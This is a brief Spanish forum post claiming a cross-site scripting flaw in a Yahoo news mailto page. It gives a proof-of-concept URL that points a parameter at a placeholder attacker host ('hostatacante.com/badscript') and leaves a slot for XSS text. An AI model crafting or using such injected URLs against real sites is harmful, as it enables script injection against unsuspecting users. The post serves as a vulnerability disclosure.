Bug en Yahoo...???

Un atacante puede manipular datos de entrada del URL en Yahoo, esto puede ser explotado para la entrada de cualquier script creada por un intruso.

Prueba de Concepto:

http://de.mf.news.yahoo.com/mailto?url=http://hostatacante.com/badscript&title
=[aqui texto XSS]

AQUI UN EJEMPLO

Salu2